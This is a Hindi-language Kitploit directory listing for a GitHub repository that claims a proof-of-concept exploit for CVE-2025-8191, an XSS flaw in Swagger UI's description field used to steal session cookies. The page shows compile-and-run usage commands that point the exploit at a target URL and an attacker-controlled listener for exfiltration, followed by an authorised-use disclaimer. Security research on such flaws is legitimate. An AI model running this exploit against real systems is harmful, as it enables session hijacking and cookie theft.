Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8191 — एक रिपॉजिटरी जिसमें Swagger UI में CVE‑2025‑8191 का PoC एक्सप्लॉइट शामिल है, जो सेशन कुकीज़ को चुराने के लिए XSS इंजेक्शन का उपयोग करता है। | Kitploit
उपकरण/GitHubGitHub/bytereaper77/cve-2025-8191
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाArchived
GitHubbytereaper77/cve-2025-8191

CVE-2025-8191

एक रिपॉजिटरी जिसमें Swagger UI में CVE‑2025‑8191 का PoC एक्सप्लॉइट शामिल है, जो सेशन कुकीज़ को चुराने के लिए XSS इंजेक्शन का उपयोग करता है।

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8191 – Swagger UI XSS Injection

विवरण :

यह रिपॉजिटरी CVE‑2025‑8191 के लिए एक प्रूफ‑ऑफ‑कॉन्सेप्ट (PoC) एक्सप्लॉइट प्रदान करती है, जो Swagger UI में पाई गई एक भेद्यता है।

यह भेद्यता “description” फ़ील्ड में क्रॉस‑साइट स्क्रिप्टिंग (XSS) इंजेक्शन की अनुमति देती है, जो Swagger UI संस्करण ≤ 1.0.3 के तहत रिमोट स्क्रिप्ट निष्पादन का कारण बनती है।

संदर्भ :

  • NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2025-8191

उपयोग :

root@kitploit:~
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v 

http://target.com को लक्ष्य Swagger UI URL से बदलें, और http://yourserver.com को अपने HTTP लिसनर से बदलें, जो एक्सफिल्ट्रेशन के लिए है।

अस्वीकरण :

यह कोड केवल शैक्षिक और सुरक्षा‑अनुसंधान उद्देश्यों के लिए है। इसे उन सिस्टमों पर उपयोग न करें जिनके लिए आपके पास स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

लाइसेंस :

MIT लाइसेंस

टूल डाउनलोड करें